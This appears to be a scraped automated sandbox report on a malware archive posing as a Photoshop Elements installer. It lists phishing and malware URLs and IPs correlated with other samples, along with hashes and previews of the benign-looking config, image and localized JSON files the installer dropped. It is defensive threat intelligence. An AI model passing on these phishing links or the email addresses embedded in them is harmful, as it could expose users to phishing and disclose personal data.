                                                            ```json{  "legit_domain": "adobe.com",  "classification": "wellknown",  "reasons": [    "The domain 'adobe.com' is the legitimate domain for the brand Adobe.",    "The URL 'auth.services.adobe.com' is a subdomain of 'adobe.com', which is common for legitimate service-specific URLs.",    "Adobe is a well-known brand with a strong online presence.",    "The use of 'auth.services' as a subdomain is typical for authentication services and does not appear suspicious."  ],  "riskscore": 1}
                                                            URL: auth.services.adobe.com
                                                                        Brands: Adobe
                                                                        Input Fields: Email address
                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                            18.239.50.31http://www.de-battle.netGet hashmaliciousUnknownBrowse
                                                              FW Vipul Patel shared CMES Inc..pdf with you.emlGet hashmaliciousUnknownBrowse
                                                                https://roblox.tz/games/10449761463/BOSS-The-Strongest-Battlegrounds?privateServerLinkCode=11856892146830167735895077236647Get hashmaliciousUnknownBrowse
                                                                  reference usfinancegl@ey.com - Search.pdfGet hashmaliciousUnknownBrowse
                                                                    https://www.exactcollisionllc.com/Get hashmaliciousUnknownBrowse
                                                                      https://www.exactcollisionllc.com/Get hashmaliciousUnknownBrowse
                                                                        https://www.exactcollisionllc.com/Get hashmaliciousUnknownBrowse
                                                                          https://www.0769qilin.com/Get hashmaliciousUnknownBrowse
                                                                            63.140.62.222http://vimuscle.vi/css/TB.htmlGet hashmaliciousUnknownBrowse
                                                                            • info.telstra.com.au/b/ss/telstratdtmglobalprd/1/JS-2.10.0/s81407038587847?AQB=1&ndh=1&pf=1&t=24%2F8%2F2024%2021%3A37%3A27%202%20240&sdid=080702B973E60E46-3262A79A37C4013C&mid=80393247477718675596040170536517987875&aamlh=6&ce=UTF-8&ns=telstracorporation&cdp=3&fpCookieDomainPeriods=2&pageName=TD%3ATR%3ATR%3Acss%3Asign%20in%20with%20your%20telstra%20id&g=http%3A%2F%2Fvimuscle.vi%2Fcss%2FTB.html&cc=AUD&ch=css&server=vimuscle.vi&events=event27&aamb=j8Odv6LonN4r3an7LhD3WZrU1bUpAkFkkiY1ncBR96t2PTI&c1=TD&v1=TD&h1=TD%7CTR%7CTR%7Ccss%7Csign%20in%20with%20your%20telstra%20id&c2=TR&v2=TR&c3=TR&v3=TR&c4=D%3Dv5&v4=D%3Dch&c5=D%3Dv72&v5=tb.html&c6=D%3Dproducts&v6=css%3Atb.html&c7=%2Fcss%2FTB&c8=D%3Dg&v8=D%3Dg&c9=%2F%2Fwww.telstra.com.au%2Fcontent%2Fdam%2Fanalytics%2Fadobetags.min.js%3Fsource%3DCQ5%20%7C%20launch%20%7C%20prd%20%7C%20tz%3D-4&c11=no%20jQuery&c16=Wed%2C%2025%20Sep%202024%2001%3A37%3A27%20GMT&v18=di&c19=First%20Visit&c35=D%3DUser-Agent&v35=D%3DUser-Agent&c41=9%3A30PM&c42=Tuesday&c43=Weekday&c44=D%3Dv44%2B%22%3A%22%2BpageName&v4
                                                                            63.140.62.27https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#&lt;EMAIL&gt;Get hashmaliciousUnknownBrowse
                                                                              https://www.mcafee.com/consumer/en-gb/ipz/checkout/2web/payment.html?pkgid=535&culture=en-gb&moguid=F09DE6FC-A0B4-46DF-829B-03590CD3D6E3&SID=cb6e5677-1e89-44ef-b1d8-c83d6250118a&csrcl2=Creative+Clicks+USA+CN&affid=1494&csrc=cj&ccoe=direct&ccoel2=am&cjevent=8df76a1da0cd11ef801e8a770a18b8f7&CID=240649&PID=101297887&ccstype=partnerlinks_8df76a1da0cd11ef801e8a770a18b8f7Get hashmaliciousUnknownBrowse
                                                                                http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                  https://anzsupportus.web.app/#Get hashmaliciousUnknownBrowse
                                                                                    https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                      http://cgi-wsc.alfahosting.de/extras/public/photos.cls/selection/addAll?cc=0.653810755815357&accountId=AAHS10INX3Z1&filter=&redirectUrl=https://panimex.cl/158983/secure-redirect#jacquie.treagus+csc.gov.auGet hashmaliciousUnknownBrowse
                                                                                        Steelcase Series 1 Sustainable Office Chair _ Steelcase.htmlGet hashmaliciousUnknownBrowse
                                                                                          https://z7.mqis1u.com/27p3mW2jbVyhAO1WQDjPk/Get hashmaliciousUnknownBrowse
                                                                                            https://www.supercontable.es/emailing/track_superc.php?Destino=!:%7D%7D%7C.fasttravelnet.xyz/YW5kcmVzLnRvcmliaW9AY2VsbG5leHRlbGVjb20uY29t&IdTracking=9008&user=000000Get hashmaliciousPhisherBrowse
                                                                                              Fw Message from Kevin - Update on Coles Supply Chain Modernisation 31-10-24.emlGet hashmaliciousUnknownBrowse
                                                                                                No context
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                AMAZON-02USfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                • 18.244.18.122
                                                                                                https://o000005496.photoshelter.com/Get hashmaliciousUnknownBrowse
                                                                                                • 18.239.69.9
                                                                                                Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                • 44.234.198.184
                                                                                                https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 3.165.113.58
                                                                                                https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675Get hashmaliciousKnowBe4Browse
                                                                                                • 52.217.68.204
                                                                                                https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#&lt;EMAIL&gt;Get hashmaliciousUnknownBrowse
                                                                                                • 52.215.4.125
                                                                                                botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 44.245.88.8
                                                                                                https://uxfol.io/p/b02d8c67/029f480aGet hashmaliciousUnknownBrowse
                                                                                                • 99.83.217.1
                                                                                                https://www.trendytechinsight.com/sxGet hashmaliciousUnknownBrowse
                                                                                                • 52.222.236.94
                                                                                                guia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 3.5.216.51
                                                                                                AMAZON-02USfile.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                • 18.244.18.122
                                                                                                https://o000005496.photoshelter.com/Get hashmaliciousUnknownBrowse
                                                                                                • 18.239.69.9
                                                                                                Pmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                • 44.234.198.184
                                                                                                https://arcalo.ru.com/#cathy.sekula@steptoe-johnson.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                • 3.165.113.58
                                                                                                https://webconference.protected-forms.com/XZmlBeUlkbExkNHYxS3piZldoaGJqTzUrV3RZK1BkOGZVMlRsRGFZcnlYbnJ1K3h1VjJEMnY1d0lXNFNQVmswcXFCTmFqczEyaHMyc3lwSUpvNnFFYlJLemVwaEpGbjRXVnVRRk93ZUxYY0dwRmhsZ010WmVrNTNVR0N0YkdCeTRnTHZMb043aXdiVFo5a25TNjZkVThLaW8wem41RTU3MUl5b2dxWjNpdjFLNWdRSmdxL2ZocGVvdDVBPT0tLVNLdmlEU1hLTGZIRW9VQ0YtLWFoQVVsMnk3VVFLbzBPZHpycUt6OEE9PQ==?cid=2178924675Get hashmaliciousKnowBe4Browse
                                                                                                • 52.217.68.204
                                                                                                https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#&lt;EMAIL&gt;Get hashmaliciousUnknownBrowse
                                                                                                • 52.215.4.125
                                                                                                botnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                • 44.245.88.8
                                                                                                https://uxfol.io/p/b02d8c67/029f480aGet hashmaliciousUnknownBrowse
                                                                                                • 99.83.217.1
                                                                                                https://www.trendytechinsight.com/sxGet hashmaliciousUnknownBrowse
                                                                                                • 52.222.236.94
                                                                                                guia_evfs.vbsGet hashmaliciousUnknownBrowse
                                                                                                • 3.5.216.51
                                                                                                OMNITUREUSPmendon.ext_Reord_Adjustment.docxGet hashmaliciousCaptcha PhishBrowse
                                                                                                • 66.235.152.156
                                                                                                https://www.bing.com/ck/a?!&&p=5ceef533778c3decJmltdHM9MTcyMzQyMDgwMCZpZ3VpZD0zNjRmNjVlOC1lNTZjLTYxOWQtMTI1Ny03MTNlZTQyYTYwMTImaW5zaWQ9NTE0MA&ptn=3&ver=2&hsh=3&fclid=364f65e8-e56c-619d-1257-713ee42a6012&u=a1aHR0cHM6Ly9sZXhpbnZhcmlhbnQuY29tLw#aHR0cHM6Ly9wVGhOLmFpcnJjb2Z2YmMuY29tL1lSZVhqTi8=/#&lt;EMAIL&gt;Get hashmaliciousUnknownBrowse
                                                                                                • 63.140.62.27
                                                                                                EXT__Transaction Details for Martibs -462fd4a1151861ecbc00b016e69e7825.emlGet hashmaliciousUnknownBrowse
                                                                                                • 63.140.62.17
                                                                                                https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                • 66.235.152.156
                                                                                                https://funpresc.pe.gov.br/976823/secure-redirect/index.html#Francois.barbeau+staples.ca%20%20https://mazans.com/WEB-ID-5672849687924/zerobot?email=Francois.barbeau@staples.caGet hashmaliciousCaptcha PhishBrowse
                                                                                                • 66.235.152.156
                                                                                                https://www.mcafee.com/consumer/en-gb/ipz/checkout/2web/payment.html?pkgid=535&culture=en-gb&moguid=F09DE6FC-A0B4-46DF-829B-03590CD3D6E3&SID=cb6e5677-1e89-44ef-b1d8-c83d6250118a&csrcl2=Creative+Clicks+USA+CN&affid=1494&csrc=cj&ccoe=direct&ccoel2=am&cjevent=8df76a1da0cd11ef801e8a770a18b8f7&CID=240649&PID=101297887&ccstype=partnerlinks_8df76a1da0cd11ef801e8a770a18b8f7Get hashmaliciousUnknownBrowse
                                                                                                • 66.235.152.156
                                                                                                http://swctch.comGet hashmaliciousUnknownBrowse
                                                                                                • 63.140.62.27
                                                                                                Sampension-file-846845087.pdfGet hashmaliciousCaptcha PhishBrowse
                                                                                                • 66.235.152.221
                                                                                                https://anzsupportus.web.app/#Get hashmaliciousUnknownBrowse
                                                                                                • 63.140.62.27
                                                                                                https://support-facebook.kb.help/your-facebook-account-has-been-restricted/Get hashmaliciousHTMLPhisherBrowse
                                                                                                • 63.140.62.27
                                                                                                No context
                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                C:\Users\user\AppData\Local\Temp\PhotoshopElements_2024_LS30_win64.exeWinterRoost_Bearfoos Malware.zipGet hashmaliciousUnknownBrowse
                                                                                                  C:\Users\user\AppData\Local\Temp\is-35JO9.tmp\Must-School-Districts-In-California-Offer-Free-Healthcare-For-Employees.tmpWinterRoost_Bearfoos Malware.zipGet hashmaliciousUnknownBrowse
                                                                                                    C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exeWinterRoost_Bearfoos Malware.zipGet hashmaliciousUnknownBrowse
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):537
                                                                                                      Entropy (8bit):5.147241145555799
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:12:TMHdtTyKAywopOGmNTWe7SJJnPd+p3mv9NhuaAi4HY2:2dtTgopj2GJJnPd+p3mvXB2
                                                                                                      MD5:9BF27F7E06B54FC3711224323D4FA105
                                                                                                      SHA1:F870330D52A34C4E3F475CE117E779A510FF3501
                                                                                                      SHA-256:195A6EEB37951C00E8A3CD3366F0BE21AB9AA4124379D5B8EC468A9368F477FD
                                                                                                      SHA-512:4727BE8B5C550F3B578360512FC243CA9599112B44088066F6204B09D30238BC51100E1B45DDD549DAE0F5990A924216CC0330AAB9B036B8AB445D44306BDEC0
                                                                                                      Malicious:false
                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<Config>...<UIConfig>....<HideVersion>true</HideVersion>....<SkipLaunch>false</SkipLaunch>....<HidePIIScreen>false</HidePIIScreen>....<ShowInstallOptions>true</ShowInstallOptions>....<CarouselType>GenericCarousel</CarouselType>....<SkipAccLaunch>true</SkipAccLaunch>....<LaunchProductDetail>.....<ProductInfo>......<SAPCode>HPSE</SAPCode>......<BaseVersion>24.0</BaseVersion> ......<Platform>win64</Platform>.....</ProductInfo>....</LaunchProductDetail>...</UIConfig>..</Config>..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 88 x 84, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3054
                                                                                                      Entropy (8bit):7.920741815156119
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:EetobvO+qOt7dLQDys5pZBAmoM67nXGzwONXAyP+RNONUTRbUc:EetOhlldkDy6ploN7O3NQyoON2F
                                                                                                      MD5:EB5FDB63686193E55826A8DD77D64412
                                                                                                      SHA1:977C4788ABF0F274E74281C4DA76C0C3D2F26B76
                                                                                                      SHA-256:1DBCFFB6B2837F5C42CC90713F01F7E7E82B45337DE78B1204F67E0AD7FA488B
                                                                                                      SHA-512:C3849CC0A289A36A70E7B4968BC379E118CA80D3E87AFF2477FD7FBD514B66CD67E199B17B41277A6F3C8794B88CC69532B233016BFEC2EE98D3F0C17DBBC4E8
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR...X...T......W.O....pHYs...........~.....IDATx..]kl...>k....c.6v.....HL....*.,."..(U..*?Z....O!R.3.....?m.T.R5.............$.B.%P.K.~?.56.1[}.{.y..;............{.;.L&Cv.5o]EDOd.{......"ED...a..I...;+.C.[A.A"...%...h_&....~.....&.....0.......2..I.5...{....9.9"..\..c.\O.g...#8..F.wPi..TT..G.#9.8.|.[....vRq.v`2......Q..i.5.#.K.,.....l.p6.+)o.@5...0..T_.]O....$a#..."...z8.g.k.X5.@...0....8....b...}....q.j.,.>8TRjx...e.?.6.N.t..qO1..MD..l...r.j.Ozh...4.........T.f.........^.+$A..hU...}.)*.........f..i o:...E.,....*[6Q.8L..Lt.....,6....*o._.m..{P...,.$fG/S8.`..........O..u.NP....Tk.^..q=..M]:mz...>....&]........|zL...(.>..5To.M......Y....P.............P>$...a_.....Xu! 0...aY..Stc...y@....8L..&..\..#Q....w....ZaCWF... ...B.....Vw.....%_..`#a..^.%....>[!.X.!oB.;.F.6s.".?=)........6.B.g.R..B..N...4@.FO......Z.!,.B.I4.........&k....A.....;!...J.}%...'T~..9E...o..+.J..?...g..R....... ....Q......c....z..F.B...Za.FN.Z..+X(".d.
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:PNG image data, 176 x 168, 8-bit/color RGBA, non-interlaced
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6367
                                                                                                      Entropy (8bit):7.956445451701175
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:h9MSclSloV7H9lto+rXTyjlWRixx1dYsxe:LtXo1H9Po+rDyjlWRiXXYv
                                                                                                      MD5:2152D117D6E4FDEB0510DA1FDCEAE7E3
                                                                                                      SHA1:ACD10C0B6653041E6CE4241DCCEF1445D12E2DB8
                                                                                                      SHA-256:4A95D46DAC22AA1477093EB7B5655A73C3C7152A985AB7A5148327E93309F985
                                                                                                      SHA-512:5A7AF9736FC3C7329FC680BBAA80FDD8D74F0D98D2422CC57C64B78A30D3C68F799F5E584CF1D6D283B6E827FC391130484C2726D59C70D97AE2D0774239AF2F
                                                                                                      Malicious:false
                                                                                                      Preview:.PNG........IHDR.............@2d.....pHYs...........~.....IDATx..m...y..o.+{.eaYb_..c.cC0.j-...VPLJbT\.......P..*.Kl.%}.j>......$;2.....G1...v....).0....e.e..n.?{g=wv.33..y.I.6./s...3..9.y&S,.I..\..D.?..(KD.Y.N. .a":FD...}.+.l.gr=;.hKI..R_<%.. d".W.....3H.p&...^$...hS8@...b.../..3......h{...x....b.o..W....\.".T.)>.v..........#.../."...Nn..W.8...Rr..xSd.M.+iL.a.gr=......(...[..B)D&..z......|...[r#p*...^.#.....T.)a...NTL!J....t5..T.]Lu....L..Da.n_=...%....}..>...K..cI2lM....G..u.../N..K....hj....%.|..Jl....R."m..*.......3.... .5../..VY..9......./..]..g)S;..s....>...?Rrl)..T...2..2..z..%!u@...9O.53=V....Is.`@*...;a.B.JJ....xAuc+...c...e..4:.l.....K.w...uZ.......45z..#..#..(QU[O.VnPv.M..Xj.|.{..%.j......>@X...1..+......uVb.j..G7..8.....|....K..#.....M/8>..r`wY....|...^H.........U.[T.q.1t|.........C...wO"L....f.....A..t...~..Z.:..5O1az!5zR`iD..~........H.....|..{..JT.a....X.IW.|..jj]....>...!.;1r...t..W0Y...G..L.. S]#.\<.....tg.6{....!
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1015
                                                                                                      Entropy (8bit):5.284650663061944
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:M0X5cRWm36aKQgO3lcQgj8fPJmKhxRR+SPoy1KaY4ScBhPbxZtqy3Ui:l566JQgC7gYfPRhx6SPo1/LcXNZtp
                                                                                                      MD5:44DB45EFBB65BAC062FB7C8B849A203D
                                                                                                      SHA1:00E75EA3FADB83DFC42616DEDF831F6BF8017EDC
                                                                                                      SHA-256:3D4D96649072E293B76A41A497B19BC48811B2C8BE9D2742255B96751BC09FEB
                                                                                                      SHA-512:683D31755D68816B6CD575956C2161FF92A89C4B8C6D188683E435E6C4BE5DA621FF9819DA65EFB524C1983395154DA8DAE98ED94F236A71517BF13CE519A64B
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "V.ukov. lekce k aplikaci Photoshop Elements",.. "SubTitle": "Za.n.te, nau.te se z.klady a nechte se inspirovat.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64bitov. verze) (minim.ln. po.adavek)",.. "OperatingSystemMac": "Mac OS 10.12 (minim.ln. po.adavek)",.. "Memory": "Instalace aplikace vy.aduje alespo. 4 GB pam.ti RAM",.. "TextSlide1": "Sjedno.te barvu a.t.n s.jinou fotografi. nebo vyu.ijte p.ednastaven..",.. "TextSlide2": "Vytvo.te stylizovan. text za p.r sekund.",.. "TextSlide3": "Vytv..ejte a sd.lejte foto p.sma ve form.tu MP4.",.. "TextSlide4": "Jedn.m kliknut.m vyb.rejte oblohu nebo pozad.. ",.. "TextSlide5": "Nov., osv..en. podoba - se sv.tl.mi a tmav.mi re.imy.",.. "TextSlide6": "Plus",.. "TextSlide7": "Panel Rychl. akce pro .pravy jedn.m kliknut.m",.. "TextSlide8": "Integrace slu.by Adobe Stock",.. "TextSlide9": "Aktualizace webov. a.mobiln. verze ",.. "TextSlide10": "(betaverze pouze v.an
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):946
                                                                                                      Entropy (8bit):4.953889317998113
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ARWqWN36awP3lc90XpYn9VVRndMMAEBzSKhm5tG9kx:vX6hfyXn9523GI5tV
                                                                                                      MD5:1FBC842F9A1E6F76E6ACF661816FE62E
                                                                                                      SHA1:D8B0EC6941246B4B423C1A15467EFBCAEC8121A7
                                                                                                      SHA-256:5D6ABD25084CBF6F04D54C0164E5E0B3F89D969A91E2E850C7DAE77588E571B8
                                                                                                      SHA-512:58A0A04E76B0D0F35EAA01B03F37DFBBEDD60279FFCCB26CC4FD34F6562DD8ECA8CF1891578861A06C393AA82A5E41537618D6598E4080264FBB1B4C7B024170
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Photoshop Elements . Tutorials",.. "SubTitle": "Erste Schritte, Grundlagen, Inspirationen.",.. "Operating1xWin": "Windows 7 Service Pack 1 (64-Bit) (mindestens erforderlich)",.. "OperatingSystemMac": "Mac OS 10.12 (mindestens erforderlich)",.. "Memory": "Sie ben.tigen mindestens 4 GB RAM, um die Anwendung zu installieren",.. "TextSlide1": "An Farbe und Ton eines anderen Fotos anpassen oder Vorgaben nutzen.",.. "TextSlide2": "Stilisierten Text in Sekundenschnelle erstellen.",.. "TextSlide3": "MP4-Foto-Reel erstellen und teilen.",.. "TextSlide4": "Einen Himmel oder Hintergrund per Mausklick ausw.hlen.",.. "TextSlide5": "Neuer, frischer Look . mit Hell- und Dunkel-Modi.",.. "TextSlide6": "Plus",.. "TextSlide7": "Schnellaktionen zur kinderleichten Bearbeitung",.. "TextSlide8": "Integration mit Adobe Stock",.. "TextSlide9": "Web- und Mobil-Updates ",.. "TextSlide10": "(Beta nur in englischer Sprache)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):835
                                                                                                      Entropy (8bit):5.02637898118712
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:RMRWsRVg6aE3lchllo8ElVwsa5kHgN7FYtQ:RDso6vEWRl6RyANh
                                                                                                      MD5:BA0A234966CC8F97101F456C96AC4632
                                                                                                      SHA1:8D00C13D7EF727210996BAD946F763B9FDB69FB0
                                                                                                      SHA-256:168D3D6C0C91C0850865733EB244760F6BB3DE0902395A443AFC44B02592A048
                                                                                                      SHA-512:391F67878830E4C907EEB5A387B94E411A9862559677264AC18A19A36840035520DE7E40B5BEE041483C1AC6B66D3ABDD389E7502C423D6FC701AB2088580D6E
                                                                                                      Malicious:false
                                                                                                      Preview:{..."Name":."Photoshop Elements tutorials",..."SubTitle":."Get started, get the essentials, get inspired.",..."Operating1xWin": "Windows 7 Service Pack 1 (64-bit) (Minimum required)",.. "OperatingSystemMac": "Mac OS 10.12 (Minimum required)",.. "Memory": "You need minimum 4Gb RAM to install the application",..."TextSlide1": "Match the color & tone from another photo or use presets.",..."TextSlide2": "Create stylized text in seconds.",..."TextSlide3": "Create & share MP4 Photo Reels.",..."TextSlide4": "One-click to select a sky or background.",..."TextSlide5": "New refreshed look . with light and dark modes.",..."TextSlide6": "Plus",..."TextSlide7": "Quick Actions panel for one-click edits",..."TextSlide8": "Adobe Stock integration",..."TextSlide9": "Web & mobile updates ",..."TextSlide10": "(English-only beta)"..}..
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):970
                                                                                                      Entropy (8bit):4.889772694170443
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:ycRW05836yd3lcsRmz42/gcA69PAHxZDx8lHntBKvsI:qYY6evB2/GWlHntBAsI
                                                                                                      MD5:6D77FA7C087128F0DDACB5D1C86C95E2
                                                                                                      SHA1:668E0CA6D419FA09A4DB81BC8469BAF686835A46
                                                                                                      SHA-256:320A7B8CD564064EC11925C96F0F323B19FFC82440439C4B87ABFF59A658F1E5
                                                                                                      SHA-512:2F66150B342F41F2968B44001EE53F6457081DD58A715DDF68DFFAE3B5213643AA7BB6435E7DFDAB518533EFDD0A407412B8DF9948A7CAAB14A34BE6C6377CDC
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Tutoriales de Photoshop Elements",.. "SubTitle": "Empiece, descubra los fundamentos y encuentre inspiraci.n.",.. "Operating1xWin": "Windows 7 con Service Pack 1 (64 bits) (m.nimo requerido)",.. "OperatingSystemMac": "Mac OS 10.12 (m.nimo requerido)",.. "Memory": "Se necesita un m.nimo de 4.GB de RAM para instalar la aplicaci.n",.. "TextSlide1": "Combine el color y el tono de otra foto, o bien utilice ajustes preestablecidos.",.. "TextSlide2": "Cree un texto estilizado en segundos.",.. "TextSlide3": "Cree y comparta reels de fotos en MP4.",.. "TextSlide4": "Haga clic una vez para seleccionar un cielo o fondo.",.. "TextSlide5": "Nuevo estilo renovado con modos claro y oscuro.",.. "TextSlide6": "M.s",.. "TextSlide7": "Panel Acciones r.pidas para realizar ediciones con un solo clic",.. "TextSlide8": "Integraci.n con Adobe Stock",.. "TextSlide9": "Actualizaciones web y m.viles ",.. "TextSlide10": "(Beta solo en ingl.s)"..}
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1027
                                                                                                      Entropy (8bit):5.00331328127714
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:x6cRWqKJ36hxMM3lQCidzBjNR2NPjyFBWdsBXJKAvE1uoXutXUB9Rn:gqKB6hxt+B1jNR2NVdsBZrvNyutkpn
                                                                                                      MD5:CC854F1036F7591BF00E2AFEB465F659
                                                                                                      SHA1:60457317A8F7F241C3F94595C13E37F4A8DC3352
                                                                                                      SHA-256:67A1C6394300FB01B4DF5C8D1ECCA0AB026797BD2C1BEB09084BEA356DF89754
                                                                                                      SHA-512:8A26F56E1E6861C1CFCF07F8349AD0F32FC60D962E5433997B7F6F8B7D361F172A8CDB9717297EC91ECD7989A88B1A93D696382BA5852723528DBACD50F70D8E
                                                                                                      Malicious:false
                                                                                                      Preview:{.. "Name": "Tutoriels Photoshop Elements",.. "SubTitle": "Lancez-vous, saisissez l'essentiel, soyez inspir..",.. "Operating1xWin": "Windows.7.Service.Pack.1 (64.bits) (minimum requis)",.. "OperatingSystemMac": "Mac.OS.10.12 (minimum requis)",.. "Memory": "Vous avez besoin de 4.Go de m.moire vive minimum pour installer l'application.",.. "TextSlide1": "Faites correspondre la couleur et le ton d.une autre photo ou utilisez des param.tres pr.d.finis.",.. "TextSlide2": "Cr.ez du texte stylis. en quelques secondes.",.. "TextSlide3": "Cr.ez et partagez des Bobines de photos MP4.",.. "TextSlide4": "Un seul clic pour s.lectionner un ciel ou un arri.re-plan.",.. "TextSlide5": "Nouveau look revisit. avec les modes clair et fonc..",.. "TextSlide6": "Plus",.. "TextSlide7": "Panneau Actions rapides pour les modifications en un clic",.. "TextSlide8": "Int.gration dans Adobe Stock",.. "TextSlide9": "Mises . jour Web et mobiles ",.. "TextSlide10": "(Version beta
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\is-39DMU.tmp\PhotoshopElements_2024_LS30_win64.exe
                                                                                                      File Type:JSON data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):970
                                                                                                      Entropy (8bit):4.801728131561229
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:Ym3cRWV9z36aMR13lcqR+8WI69y/2TEeeQIMcwmx4LeJqASUtXIH:JDP61FBvWI693IA5ASUtXo
                                                                                                      MD5:37879C31149C21FB5DF9DAADCD67E909
                                                                                                      SHA1:20E314739D229E4B5DA2AF435BB0F251C06DB0C9
                                                                                                      SHA-256:17AC21F4AD75970E29C644CAC412483B4AB3B5611807E6C963FB72189AD9989B
                                                                                                      SHA-512:CF29AC25D8DE0E0AD658B02AF25A0B88CE643F26679BE2B3F2E944E4B558FACBA94804CC88C32F550395708D0BDA003AD09FCBBFA2A9FA8FB70820F7775E0113
                                                                                                      Malicious:false
